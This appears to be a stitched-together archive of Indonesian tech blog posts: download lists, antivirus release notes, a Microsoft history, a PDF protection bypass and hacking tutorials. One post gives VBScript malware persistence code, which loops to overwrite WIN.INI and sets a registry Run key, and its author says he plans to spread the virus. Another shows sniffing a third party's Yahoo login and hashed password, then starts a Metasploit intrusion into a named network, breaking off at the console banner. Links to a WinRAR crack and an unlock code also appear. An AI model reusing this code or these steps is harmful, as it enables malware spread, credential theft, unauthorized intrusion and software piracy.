IPTEKCOM

Download Gratis

2009-03-17T10:06:00.000+07:00

DOWNLOAD ANTIVIRUS:

Download PC Media Antivirus Terbaru: PCMAV 2.0 (Format 7-zip)
Download PCMAV Update Build Terbaru
Download EasyParameter for PCMAV (60 kali)
Download ClamAV Win32 Library 0.94.2 (290 kali)
Download ClamAV main.cvd (459 kali)
Download ClamAV daily.cvd (348 kali)
Microsoft VC80.x86 (70 kali)
Download ANSAV Terbaru (437 kali)
Dr.Web (CureIt) Antivirus (206 kali)
Tools untuk Menghentikan Virus Pendekar Blank dari Memori (137 kali)
Hentikan Proses Virus Pendekar Blank dengan Proclister (99 kali)
Restore My Files (89 kali)
Sality Remover (140 kali)
Almanahe Remover (93 kali)
KillVB (72 kali)
Hexapad 1.2 (56 kali)

DOWNLOAD COMPRESSION TOOLS:

7-Zip (135 kali)
WinRAR 3.80 (83 kali)
Crack WinRAR (69 kali)
HJ-Split for Windows and Java (12 kali)
HJ-Split Multi-PlatForm (17 kali)

DOWNLOAD APLIKASI HANDPHONE (PONSEL):

UltraMP3_S60_1.45_full (58 kali)
UltraMP3_S60_1.52_full (47 kali)
Unlock Kode UltraMP3_S60_1.52 (37 kali)
Opera Mini 2 (18 kali)
Opera Mini 3.1 Basic (16 kali)
Opera Mini 3.1 Advanced (22 kali)
Opera Mini 4 Beta (18 kali)
Opera Mini 4.1 (20 kali)
Opera Mini 4.2 (23 kali)
Opera Mini Terbaru (85 kali)
Mig33 (25 kali)
Mig33 Beta (24 kali)
Advanced Call Manager (17 kali)
Smart Fileman (25 kali)
X-plore (35 kali)
FExplorer (10 kali)
FGet: downloader file dari ponsel symbian (39 kali)
Evgetme: downloader file dari ponsel java dan symbian (30 kali)
PowerDip: Recorder for Symbian (16 kali)
Call Recorder: Perekam Panggilan (41 kali)
No Red Close (6 kali)
Background Music: Dengar musik sambil call (48 kali)
Anti Musquito (31 kali)
MMC Medic (29 kali)
Setting Wizard (14 kali)
Nokia Wireless Presenter (24 kali)
Sjboy: Mainkan aplikasi java ponsel di PC (94 kali)
N70 Torch: Senter for Nokia N70 (16 kali)
SMS Timer: Bikin jadwal pengiriman SMS otomatis (31 kali)
Guardian: Aplikasi anti maling (55 kali)
Slick 0.46: messenger for symbian (14 kali)
Profimail 3.03: E-mail client for symbian (12 kali)
Instant Me: mengirim aplikasi lebih mudah (19 kali)
Kamus English-Indonesia untuk Symbian dan Java (23 kali)

DOWNLOAD PETA:

Peta Kabupaten Kaur (24 kali)
Peta Propinsi Bengkulu (31 kali)

DOWNLOAD SYSTEM TOOLS

USB Write Protect (176 kali)
Yahoo Multi (64 kali)
Yahoo Multi Uninstall (27 kali)
Perbanyak Undo History MS Excel (34 kali)
Kembalikan Setting Folder Options (54 kali)
Enable: Regedit, Folder Options, MSConfig, Task Manager (29 kali)
WFPS: Windows File Protection Switcher (106 kali)
ResHack (37 kali)

DOWNLOAD MP3 Gratis

Rihanna feat Jay Z. - Umbrella (30 kali)
Linkin Park - In The End (21 kali)
Bob Marley - No Woman No Cry (24 kali)
Britney Spears - You Drive Me Crazy (18 kali)

PCMAV 2.0 Valkyrie

2009-03-17T09:59:00.000+07:00

Setelah ditunggu versi 1.94 ternyata yang keluar sekarang adalah versi yang ditunggu-tunggu selama ini yaitu versi final dari PCMAV 2.0 Valkyrie. Apa saja yang baru di antivirus kebanggaan Indonesia ini?

APA YANG BARU?

IMPROVED! Implementasi modul baru untuk manajemen operasi memory dan pencarian file yang begitu cepat dan stabil.
NEW! IntelligentScan (iScan) engine for ClamAV untuk meningkatkan akselerasi pendeteksian ketika engine ClamAV digunakan. Pada PCMAV generasi 1.x banyak dikeluhkan mengenai betapa lambatnya PCMAV ketika digabung dengan engine ClamAV. Untuk itulah kami melakukan riset mendalam untuk mengembangkan sebuah engine tambahan, yang diharapkan secara signifikan dapat meningkatkan performa PCMAV ketika digabung dengan engine ClamAV. Hasilnya, terciptalah iScan for ClamAV yang secara meyakinkan mampu meningkatkan performa scan PCMAV+ClamAV hingga 40% lebih cepat. Buktikan sendiri!
NEW! RealTime Protector (RTP) for Vista dan Windows 7. PCMAV RTP merupakan satu-satunya antivirus produksi Indonesia yang dapat berjalan lancar dan stabil di Windows Vista. Khusus untuk Windows 7, walau cukup berjalan lancar, RTP masih bersifat eksperimental mengingat Windows 7 sendiri yang masih berstatus Beta.
NEW! Virus Quarantine (karantina) untuk mengisolasi file-file yang dicurigai bervirus ke tempat yang aman dan terlindungi sebelum diambil tindakan lebih lanjut, seperti penghapusan maupun perbaikan file. Jika ternyata file tersebut tidak berbahaya (false alarm), maka dapat dikembalikan ke lokasi awal di mana file tersebut berasal. Klik angka pada info Quarantined untuk masuk ke menu karantina. Folder dan file “\quarantine\quarantine.dat” secara otomatis akan terbentuk ketika PCMAV dijalankan untuk pertama kalinya di harddisk.
NEW! Virus Submit yang terintegrasi di menu Virus Quarantine. Jika pada PCMAV generasi 1.x ditemukan file yang dicurigai (suspected) maka Anda harus mengirimkan contoh file tersebut secara manual melalui e-mail dengan sebelumnya dilakukan kompresi yang terpassword. Kini keribetan tersebut tidak ada lagi. Fitur Virus Submit hadir untuk mempermudah pengiriman otomatis file-file yang dikarantina ke PC Media. Tinggal pilih file yang dimaksud di menu Virus Quarantine, lalu pilih Submit. File yang berhasil dikirim akan dianalisa dan sesegera mungkin dibuatkan update antivirus-nya berdasarkan skala prioritas.
NEW! PC Media Updates Manager untuk update online otomatis, baik untuk file database virus PCMAV (update.vdb) maupun ClamAV (main.cvd & daily.cvd).
IMPROVED! Integrasi awal PCMAV Cleaner & RTP. Proses awal PCMAV Cleaner kini lebih cepat karena tidak lagi memeriksa memory/sistem start-up Windows ketika RTP telah aktif. Dan untuk lebih menghemat penggunaan memory, kini PCMAV Cleaner & RTP mampu menggunakan memory bersama untuk database virus.
IMPROVED! Fitur scan melalui klik-kanan pada Explorer (/REGSHELL). Bukan hanya file, kini folder juga dapat dilakukan scan dengan klik-kanan.
NEW! Fresh-Look dengan tampilan baru yang lebih simpel, cerdas, informatif, dan tentunya menyenangkan.
BUG FIXED! Kesalahan deteksi (false alarm) heuristik pada beberapa program dan script.
IMPROVED! Database virus utama (pcmav.vdb) kini dikeluarkan dari modul utama dan bersama file update database virus (update.vdb) diletakkan di folder “\vdb”
IMPROVED! Engine dan CVD tambahan ClamAV (0.9x) kini wajib diletakkan di folder “\plugins\ClamAV”
IMPROVED! Ditambahkan database pengenal dan pembersih 54 virus lokal/asing/varian baru yang dilaporkan menyebar di Indonesia. Total 2614 virus beserta variannya yang banyak beredar di Indonesia telah dikenal di versi 2.0.0 ini oleh core engine PCMAV.
IMPROVED! Perubahan beberapa nama virus mengikuti varian baru yang ditemukan.
IMPROVED! Perbaikan beberapa minor bug dan improvisasi kode internal untuk memastikan bahwa PCMAV tetap dapat menjadi antivirus kebanggaan Indonesia.

Sumber: virusindonesia.com

Perhatian: Sebelum mendownload PCMAV saya sarankan untuk menggunakan salah satu Download Manager atau Browser Opera dan Mozilla Firefox terbaru (3.0.7) agar proses download dapat di-resume bila proses download terhenti dan pastinya proses download akan semakin cepat. PCMAV ini dikompress menggunakan format .7z agar ukuran file menjadi semakin kecil dan proses download semakin singkat. Silakan ekstrak menggunakan WinRar atau 7zip.

Download:

Download PC Media Antivirus [PCMAV] 1.92

2009-01-30T19:40:00.001+07:00

Tidak ada antivirus lain yang mampu mengatasi dengan tuntas virus komputer, baik lokal maupun asing, yang banyak menyebar di Indonesia sebaik PCMAV.

Umumnya antivirus yang ada hanya mampu mengenali dan menghapus file yang dideteksi bervirus. PCMAV menyempurnakannya dengan tingkat akurasi pendeteksian yang lebih tinggi sehingga lebih mampu dalam mengembalikan file, dokumen dan sistem yang menjadi sasaran serangan virus hingga pulih 100%.

Dengan PCMAV, Anda akan mendapatkan antivirus yang bukan hanya sekadar mendeteksi namun daya basminya yang tangguh mampu memburu 99.9% virus yang dikenal sampai ke “akar-akarnya” tanpa menimbulkan kerusakan pada file maupun sistem yang terinfeksi.

Perpaduan keunikan fitur serta keakuratan dan kepedulian terhadap keselamatan sistem, file dan dokumen Anda memberi kesempurnaan sebuah antivirus pada PCMAV.

Di setiap edisi Majalah PC Media terbaru yang terbit tiap bulannya, kami senantiasa menyempurnakan PCMAV ini dengan kemampuan dan fiturbaru demi menjadikan PCMAV sebagai antivirus yang sesuai kebutuhan Anda, pembaca setia Majalah PC Media. Dan menjadi kebanggaan Indonesia.
APA YANG BARU?
————–
a.Ditambahkan, database pengenal dan pembersih 48 virus
lokal/asing/varian baru yang dilaporkan menyebar di Indonesia.
Total 2493 virus beserta variannya yang banyak beredar di
Indonesia telah dikenal di versi 1.92 ini oleh engine internal PCMAV.

b.Diperbarui, cleaner khusus yang dapat mengatasi varian baru
virus Windx-Maxtrox yang dapat menginfeksi file executable.

c.Diperbarui, rutin yang bertugas dalam melakukan pencarian file.

d.Diperbaiki, rutin pembasmian untuk virus yang terdeteksi oleh engine
ClamAV statusnya menjadi “Deleted” dan bukan “Cleaned”.

e.Ditambahkan, pesan konfirmasi saat hendak menghapus virus yang
dideteksi oleh engine ClamAV yang kemungkinan telah menginfeksi
dokumen office seperti DOC & XLS.

f.Ditambahkan, engine heuristic yang dapat mendeteksi varian baru
yang banyak menyebar.

g.Diperbaiki, kesalahan deteksi (false alarm) heuristik pada beberapa
program dan script.

h.Diperbarui, perubahan beberapa nama virus mengikuti varian baru yang
ditemukan.

i.Perbaikan beberapa minor bug dan improvisasi kode internal untuk
memastikan bahwa PCMAV Cleaner & PCMAV RealTime Protector lebih
dari sekadar antivirus biasa.

Download PCMAV 1.92- Ziddu.com | Indowebster.com | RapidShare.com

Anda cukup mendownload dari salah satu link yang disediakan. Jika merasa bermasalah dengan salah satu server, Anda dapat mencoba dengan server lainnya.

About Microsoft

2008-12-14T11:43:00.000+07:00

US corporation, now the world's largest software supplier. Microsoft's first major product was a version of BASIC, written for the first personal computer, the MITS Altair, in 1975, and adopted by most of the desktop computer industry. Through MS-DOS, written for IBM, Windows, and related applications it has steadily increased its hold on the personal computer market.

Microsoft was founded by Bill Gates and Paul Allen in 1975. Bill Gates was the company's chief executive until January 2000, when he stepped down in order to spend more time on developing new technologies, becoming ‘chief software architect’, but remaining Microsoft's chairman. Steve Ballmer, the company's president since 1998, became chief executive.

Growth

In 1980, when it had a staff of 40, Microsoft was contracted to produce a BASIC and DOS (Disk Operating System) for IBM's first mass market microcomputer, the IBM PC. With the success of the IBM PC, Microsoft grew rapidly to 6,000 staff and a turnover of US$1 billion in 1990, when it launched Windows 3, a hugely successful graphical user interface for DOS. In 1993 Microsoft was voted by Fortune magazine as the ‘most innovative company operating in the US’, and in 1997 in a public poll (carried out by Hart and Teeter), Microsoft was revealed as the ‘most admired’ company in one of the ‘most admired’ industries. With the launch of Windows 95 and Windows 98, and ancillary sales of Windows applications (Word, Excel, Microsoft Office) and CD-ROM programs such as Encarta, Microsoft then grew to more than 20,000 staff, supplied operating systems for around 90% of the world's personal computers, and had a turnover of US$44 billion in 2006. The accompanying growth in the value of the company's shares created three billionaires (Gates, Allen, and Ballmer) while hundreds, perhaps thousands, of Microsoft's programmers have become millionaires.

Federal investigations

A US federal probe into charges that Microsoft was engaging in anticompetitive behaviour was carried out in 1990-93, from which date the US Justice Department launched its own investigations. Under a settlement reached in 1994, Microsoft agreed to end the uncompetitive practice of ‘per processor’ pricing, whereby PC manufacturers paid a fee for each machine produced irrespective of the software to be installed. In 1997, the Justice Department again accused Microsoft of anticompetitive behaviour by tying the installation of Windows 95 to the installation of Microsoft's free Web browser, Internet Explorer.

The fallout from this issue, which relates to Microsoft abusing its monopoly power against Netscape, its main competitor in Internet browsers, is not yet fully resolved. In December 1997, Microsoft was ordered to change its marketing policy. But in June 1998, an appeal court ruled that Microsoft was quite within its rights to combine its Internet browser with its operating system. This judgement was overturned in April 2000. Three months later, a federal judge ruled that the company should be split into two companies, one developing the Windows family of operating systems, and the other concentrating on applications software, such as the Microsoft Office suite of programs (including Word and Excel). Microsoft launched an appeal, and in September, the US Supreme Court ruled the appeal should be heard by a lower appeals court before the ruling was acted upon, allowing Microsoft to continue its business practices unhindered until the case is resolved. In June 2001, the appeals court in Washington, DC, unanimously reversed the order proposed by Judge Thomas Penfield Jackson to divide Microsoft, the world's dominant computer software company, in two. It also criticized the judge for his ‘appearance of partiality’, including making derogatory remarks about the company in media interviews. However, the court did accept the finding that Microsoft was a monopoly, and sent the case to a new judge to find an acceptable solution. In September, the US government said it would no longer seek the break-up of Microsoft. However, the Supreme Court rejected a plea by Microsoft to reverse the ruling that the software giant had broken antitrust laws.

Other developments

In 1996, Microsoft launched another new operating system, Windows CE (Consumer Electronics), for handheld computers, pen-operated personal digital assistants, in-car systems, and similar applications. Suppliers of CE-based HPCs (handheld personal computers) include Casio, Compaq, Hewlett-Packard, Philips, and Sharp. Windows CE version 2 is also used in an improved version of WebTV: a set-top box that enables users to surf the Internet on their television sets. Microsoft purchased WebTV Networks for US$425 million in 1997. The first companies to supply WebTV systems were Philips, Sony, and Mitsubishi. In 2000 Windows CE was renamed Pocket PC. In 2002 Microsoft sponsored the new tablet PC, a model halfway between handheld and notebook PCs, and running under Windows XP Tablet PC Edition. According to Microsoft, the tablet PC version of the operating system offered new, advanced handwriting and speech recognition capabilities, enabling the creation, storage, and transmission of handwritten notes and voice input. In 2007 Microsoft launched Windows Vista, its latest PC operating system and replacement for Windows XP.

Manipulasi File WIN.INI

2008-12-13T14:53:00.001+07:00

Masih ingat sama tulisan Sto di buku STH(Hack 1x19),tentang bagaimana menjalankan program secara remote pada komputer korban.Nah bagi para master virus juga pasti udah tau tentang manipulasi File WIN.INI yang terletak pada C:\WINDOWS\WIN.INI.

Selain manipulasi WIN.INI,bisa juga digunakan manipulasi File System.INI,atau manipulasi Registry(Regedit.Exe).Sebelumnya akan saya ceritakan tentang Virus yang pernah saya temukan pada komputer teman saya,ternyata virus itu melakukan manipulasi pada file WIN.INI,yaitu pada bagian Run untuk menjalankan program virus itu tiap kali komputer Starting.Ketika aku mencoba menghapus virusnya ternyata tidak bisa,kemudian aku membuka file WIN.INI dan menghapus bagian Run tadi,Setelah komputer aku Restart Virus yang tadi aku temukan dapat aku delete dengan mudah.Nah dari sini kita dapat memanfaatkan Do...Loop(baca tulisanku yang dulu “Anti Deletion File”),untuk membuat Virus yang kita buat jadi sakti(tereksekusi terus)didalam komputer korban.Gimana caranya?nah lihat script ini aja ntar aku jelasin satu persatu.bagian yang saya pikir kalian semua dah tau akan saya loncati Oke?

Dim syarah,sarah
‘menentukan variabel

Set syarah=createObject(“Scripting.FileSystemObject”)
‘mengeset nilai syarah

set sarah=syarah.CreateTextFile(“C:\WINDOWS\System.tegal”)
‘menciptakan file System dengan extensi tegal(nama dan extensi optional)

sarah.Writeline “[WINDOWS]”
sarah.Writeline “run=C:\Virusmu.vbs”
sarah.Writeline “Load=C:\Virusmu.vbs”
sarah.Writeline “[Intl]”
sarah.Writeline “ICountry=62”
sarah.Writeline “sCountry=Indonesia”
sarah.Writeline “sCurrency=Rp”
sarah.Writeline “sLanguage=Ind”
‘diatas adalah isi dari file System.Tegal

sarah.Close
‘aku pikir kalian pasti tau

Set suci=syarah.GetFile(“C:\WINDOWS\System.tegal”)
‘Memberi nilai pada variabel suci

Do
suci.Copy “C:\WINDOWS\WIN.INI”
‘mengkopikan System.Tegal ke direktori Windows dengan nama WIN.INI(inilah
hebatnya VBS dia dapat ‘dikopikan dengan nama yang lain dan extensinya
dapat dirubah)

Loop
‘ini fungsi Loop yang akan membuat WIN.INI palsu tidak bisa dihapus
sekaligus tidak bisa di edit

‘artinya meski anda berhasil menghapus bagian run-nya,tapi akan tercopy
lagi seperti semula.

Sebenernya script diatas adalah bagian dari Virus yang mau aku sebarkan. Script diatas akan menciptakan File System.Tegal(Optional,bisa pake nama&Extensi apa aja yang penting bisa menipu)yang jelas Ciptakan file dengan extensi terserah anda dalam hal ini saya pake extensi .Tegal(karena ga ada program yang bisa baca Extensi .Tegal).Setelah itu Copykan file itu di Direktory Windows dengan nama WIN.INI(rubah extensinya)File WIN.INI sudah ada akan digantikan dengan File yang anda buat.Manipulasi ini dapat pula dilakukan pada Registry(Regedit.exe).Nih lihat contohnya aja biar jelas

Do
Set sarah=CreateObject(“Wscript.Shell”)
sarah.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Sarah”,
”C:\Virusmu.exe”
Loop

Download mp3 dengan menggunakan trick di radioblogclub

2008-12-13T14:52:00.001+07:00

Anda susah mencari lagu yg anda ingin kan melalui downloadÂ dari internetÂ ?, baik lah saya tidak tau article ini sudah di buat atau belom sebelumnya...

Langkal awal ada lah browsing ke http://www.radioblogclub.com lalu register di sana (gak usah bisa juga sih) lalu di search kolom , tulis nama lagu atau artis yg ingin anda download ... lalu muncul lah list dari pencarian tersebut.

Dari list itu arah kan mouse pada lagu or artis yg anda inginkan lalu copy short kan nya example : javascript:openRadio('http://www.titours.be/radio.blog/?autoplay=23') nah paste alamat itu ke kolom alamat di browser anda lalu hilangkan openRadio(' <>?autoplay=23' lalu jadi lah http://www.titours.be/radio.blog/.

Selanjutnya tambahkan ( sounds ) lalu menjadi http://www.titours.be/radio.blog/sounds/ nah anda coba click itu lalu download lah ( file ini di compres menjadi small jadi gak perlu lama mendownloadnya).

contoh ke 2 : http://www.[target].be/radio.blog/ + sounds http://www.[target].be/radio.blog/sounds/

informasi ini di tujukan untuk semua terutama bagi newbie,

Buka Proteksi File PDF dengan menggunakan XPDF Linux Ubuntu dan PDF Creator

2008-12-13T14:48:00.000+07:00

Date: Monday, May 15, 2006 Hits: 917 By: kendari_underground

Kita tentunya sering menjumpai file-file dokumen dalam bentuk E-Book (.pdf). Terkadang Buku atau artikel pendek yang mempunyai isi yang sangat bagus kita butuh beberapa baris untuk mengkutip beberapa kalimat dari dokumen tersebut sebagai referensi, dan tentunya mengikuti etika yang berlaku "harus mencantumkan narasumber dari kutipan yang kita gunakan tersebut.

Sebagai warga negara yang sadar akan hukum tentunya niat untuk mencantumkan nama
dari narasumber sudah melekat di dalam sanubari. Seperangkat peralatan untuk melakukan
pengkutipan artikel telah disiapkan mulai dari Adobe Reader hingga Microsoft Word,
Tapi apa gerangan yang terjadi "Copy To Clipboard-nya ko ngga muncul ";
dokumen ternyata diproteksi. Sakit rasanya hati, kaya dicubit gorila (nyontek dari film "Tak Biasa").
Kecanggihan software memang telah memberikan kemudahan kepada penggunanya dalam mengamankan dokumen
dan semakin hebat pula proteksi yang diberikan.

Sekarang Kita butuh 2 aplikasi sebagai senjata untuk membuka proteksi tersebut :

1. xpdf for Linux and

2. PDF Creator Version 0.8.0 (http://www.pdfcreator.de.vu/) for Windows

Kali ini penulis menggunakan 2 sistem operasi untuk menjalankan ke dua aplikasi tersebut
(Linux Ubuntu 5.10 dan Windows XP SP2), di mana dokumen pdf yang terproteksi akan di konversi
menjadi file .ps (postscript) dengan menggunakan xpdf, kemudian file .ps tersebut akan di export
menjadi file pdf dengan menggunakan PDF Creator.

Langkah Pertama

1.Jalankan Sistem operasi Linux Ubuntu dan buka file yang terproteksi tersebut dengan menggunakan aplikasi xpdf.
2.Setelah file tersebut terbuka, print dokumen tersebut ke dalam format ps (postscript)
dengan mengklik logo print pada status bar Aplikasi xpdf tersebut.
3.Jendela Xpdf: Print akan muncul â€“ aktifkan option print to file lalu tentukan lokasi penyimpanan file .ps
[defaultnya, file akan disimpan di mana tempat file pdf tersebut berada].
4.Setelah file tersimpan pada lokasi yang telah ditentukan, akan tercipta satu file baru dengan ekstensi .ps
5.Sampai di sini langkah pertama sudah selesai

Langkah Kedua

Untuk melakukan export file dari .ps ke .pdf kita membutuhkan aplikasi tambahan yaitu PDF creator
yang dapat di download langsung dari situs resminya http://www.pdfcreator.de.vu/.
Penulis mengasumsikan bahwa PDF Creator telah terinstal pada komputer anda.

1.Buka Windows Explorer, cari file yang tadi telah konversi menjadi file .ps, klik kanan,
open with PDF, dan pilih Creator PDF and Bitmap files with Ghostscript
2.Setelah jendela PDF Creator terbuka, isi kolom-kolom tersebut sesuai dengan keinginan anda
3.Sebelum menjalankan proses export, lakukan settingan security pada options PDF creator, klik Tombol Options
4.Pastikan bahwa option Security tidak tercentang, sebab bila di aktifkan file pdf akan tetap terproteksi,
dan semua langkah yang telah kita lakukan akan sia-sia.
5.Klik Tombol Save, kita akan kembali ke jendela PDF Creator.
6.Klik Tombol Save lagi , dan tentukan lokasi penyimpanan file.
7. Sampai di sini langkah kedua sudah selesai. Langkah terakhir adalah melakukan uji hasil.

Langkah Ketiga

1.Buka file pdf yang tadi telah di export oleh PDF Creator dengan menggunakan Adobe Reader atau aplikasi lainya.
Bingo ... dokumen terbebas dari proteksi.
2.Selamat mencoba.

<<<>>>

- Experimen dilakukan pada file pdf yang menggunakan proteksi
- copy text and images
- print the document
- modify the document
- modify comment
- Encription Level : Low (40-bit RC4) & High (128-bit RC4)

- Jika file pdf menggunakan proteksi Document Open Password, teknik di atas tidak akan bisa digunakan.

Iterating Through Multi-Page Results

2008-12-13T14:44:00.002+07:00

As buckets can contain a virtually unlimited number of keys, the complete results of a list query can be extremely large. To manage large result sets, Amazon S3 uses pagination to split them into multiple responses. The following pseudo-code procedure demonstrates how to iteratively fetch an exhaustive list of results, given a prefix, marker and delimiter:

Example

Grabbing URL, Sniffing, dan Remote Exploit

2008-12-13T14:42:00.002+07:00

Auditor security merupakan sebuah system operasi yang bersifat live-system berbasiskan pada knopix.

Menurut penciptanya yang dituliskan pada http://remote-exploit.org , linux Auditor Security diciptakan untuk
memenuhi kebutuhan para excellent-user yang dikombinasikan dengan toolset yang optimal serta penggunakan
yang user friendly. Program â€“ program open source pada auditor security menawarkan toolset yang komplit
untuk meng-analysis keamanan sebuah system, byte per byte.

Dalam tulisan ini akan dibahas sebagian dari security tool set yang terdapat pada linux Auditor Security.

A. Grabbing URL

Yang dimaksusd grabbing URL adalah mendapatkan alamat URL yang dikunjungi oleh seseorang tanpa ataupun sepengetahuan
dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu channel IRC dan pada jaringan lokal yang
terhubung dengan internet.

1. Grabbing URL pada channel IRC

Untuk melakukan grabbing URL pada channel IRC bisa dilakukan dengan menggunkan XCHAT yang telah tersedia secara bult-in
pada linux auditor. Langkah pertama tentu saja kita harus join ke channel tertentu. Setelah join ke channel tertentu
langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu beberapa saat, maka jika ada salah satu user yang
tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber akan bertambah.
Berikut ini hasil grabbing URL yang penulis lakukan pada channel : #hnet, #skb50, #indonona, #echo, #k-elektronik, #bandung
pada server dalnet tanggal 1 September 2005.

ftp.orghttp://echo.or.id
http://irc.jraxis.com/dalnet/default/
http://kline.dal.net/exploits/akills.htm#ma
http://kline.dal.net/exploits/akills.htm#ma)))
http://kline.dal.net/massads/mup.htm
http://kline.dal.net/proxy/
http://miranda-im.org
http://tiongkokmusic.com:2222/listen.pls
http://unut.hollosite.com
http://valueshells.com
http://valueshells.com/disc.html
http://www.dal.net/
http://www.dal.net/aup/
http://www.equinix.net
http://www.kecoak.or.id
http://www.malanghack.net/
http://www.rayofshadow.or.id
http://www.valueshells.com
irc.hackerszone.orgirc.vsnl.com
www.balihack.or.idwww.bandung-dal.net
WwW.BaNdUnG.tKwww.dal.net/proxies
www.jraxis.comwww.malanghack.net
WwW.PsYcHoPeD.InFowww.scoopsite.com
www.superask.netwww.VALUESHELLS.com
www.ValueShells.comwww.valueshells.com
www.valueshells.comwww.w0nk.org
www.zone-h.org/en/defacements/mirror/id=2840693/>
www.zone-h.org/en/defacements/mirror/id=2840696/>

Daftar URL diatas merupakan daftar dari URL-URL yang dikunjungi para chatter pada channel â€“ channel diatas.
Kelemahan dari XCHAT yaitu XCHAT belum mampu secara spesifik mengetahui URL yang dikunjungi tiap chatter.

2. Grabbing URL Pada Jaringan Lokal Yang Terhubung Pada Internet

Selain grabbing URL pada suatu channel IRC kita juga bisa melakukan grabbing URL pada jaringan lokal yang terhubung
pada internet. Untuk melakukanya kita bisa menggunakan URL Snarf. Untuk menjalankan URL Snarf ketikan perintah berikut
pada konsole :

hyraxz@chidori~dove# urlsnarf -i eth0 > ./grabMeBabe.txt

Setelah URL Snarf berhasil dijalankan maka tugas kita selanjutnya adalah tinggal tidur dan membuka hasil grabbing
keesokan hari.Berikut ini satu baris potongan dari hasil grabbing URL yang berhasil penulis capture, penulis hanya
menunjukan 1 baris dari 994 baris hasil grabbing yang didapat mulai dari jam 00:15:37 sampai 06:21:10 pada
tanggal 02/Sep/2005.

192.168.10.5 - - [02/Sep/2005:05:38:37 -0400] "GET http://www.friendster.com/friendrequests.php?lastact=approve&sc=933
HTTP/1.1" - - "http://www.friendster.com/friendrequests.php?statpos=homealerts" "Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)"

Dari hasil grabbing tersebut maka kita bisa mengambil suatu analisa bahwa komputer dengan IP 192.168.10.5
pada [02/Sep/2005:05:38:37 -0400] dengan menggunakan methode GET sedang mengakses www.friendster.com dan kemungkinan
besar user tersebut sedang meng-approve friend request. Sangat dimungkinkan browser dari user tersebut adalah
Mozzila/5.0 dengan mamakai sistem operasi linux.

B. Sniffing Menggunakan DSNIFF

Sniffing merupakan usaha yang dilakukan untuk memperoleh suatu informasi tertentu dalam suatu network dangan jalan
meng-capture paket â€“ paket data yang ada pada suatu network dan kemudian menganalisinya untuk diambil informasinya
yang dianggap penting. Dsiniff merupakan suatu tool sniffing yang telah tersedia pada linux auditor security.
Untuk memulai sniffing ketikan perintah berikut ini:

hyraxz@chidori~dove# dsniff â€“i eth0 â€“W /mnt/hda5/passwd_HhAN.db

perintah diatas akan memerintahkan dsniff untuk meng-capture paket - paket yang melintasi eth0 dan menuliskan hasilnya
pada sebuah file dengan nama passwd_HhAN.db yang disimpan pada directory /mnt/hda5/.
Untuk membaca hasilnya gunakan perintah berikut ini:

hyraxz@chidori~ dove# dsniff -r /mnt/hda5/passwd_HhAN.db

Atau kalau kita ingin merubahnya dalam format ASCII sehingga file tersebut bisa dibuka menggunakan notepad saat di Windows,
ketik perintah berikut :

hyraxz@chidori~dove# dsniff -r /mnt/hda5/passwd_HhAN.db > /mnt/hda5/GetDownEnemy.txt

Berikut ini merupakan file ASCII hasil dari sniffing yang berhasil penulis documentasikan :

09/02/05 04:58:42 tcp 192.168.10.7.1183 -> p2.rd.scd.yahoo.com.80 (http)GET
/reg/login1/newym_nouc/lisu/login/us/ym/*http://login.yahoo.com/config/login?.tries=1&.src=ym&.md5=&.hash=&.js=1&.
last=&promo=&.intl=us&.bypass=&.partner=&.u=b261flt1heuai&.v=0&.challenge=Ymjr9vf35ZRMTV9YkEFy0vhTsQz0&.yplus=&.
emailCode=&pkg=&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A//mail.yahoo.com&login=rip_zombie
&passwd=ace61b359fa543aceccf111dbd767e74&.persistent=&.hash=1&.md5=1 HTTP/1.1Host: us.rd.yahoo.com

Berikut analysis dari hasil sniffing di atas:
1. Sniffing dilakukan pada tgl 02 September 2005 jam 04:58:42. Sniffing dilakukan pada koneksi TCP antara host dengan
IP 192.168.10.7:1183 dengan server yahoo pada p2.rd.scd.yahoo.com:80 denagan memakai protokol HTTP.
2. User Name untuk login ke server e-mail dari user tersebut adalah rip_zombie dengan password hasil enkripsi
MD5 â€œace61b359fa543aceccf111dbd767e74â€ (tanpa tanda petik).
3. Server mail yahoo menggunakan methode enkripsi MD5.

C. Remote Exploit

Remote exploit adalah suatu program yang dijalankan pada computer attacker, digunakan untuk menginjeksi komputer target
sehingga attacker memperoleh hak akses lebih dari yang diijinkan tanpa ataupun sepengetahuan dari korban.
Linux Auditor Security menyediakan tool tersebut dengan nama Metasploit.

Menyusup di Jaringan SKB50 Menggunakan Metasploit

Sebelum memulainya tentu saja komputer attaccker harus di set IP-nya sesuai dengan IP dari jaringan SKB50. berikut ini
konfigurasi IP dari komputer attacker yang telah disesuaikan dengan konfigurasi IP pada jaringan SKB50.

hyraxz@chidori~dove# ifconfig â€“eth0 192.168.0.10 netmask 255.255.255.0
hyraxz@chidori~dove# ifconfig
eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:712 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b)
Interrupt:5 Base address:0x9800

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:500 (500.0 b) TX bytes:500 (500.0 b)

Selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit :

hyraxz@chidori~dove# cd /opt/auditor/metasploit
hyraxz@chidori~dove# ./msfconsole

jika berhasil maka akan muncul tulisan seperti berikut ini :

888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
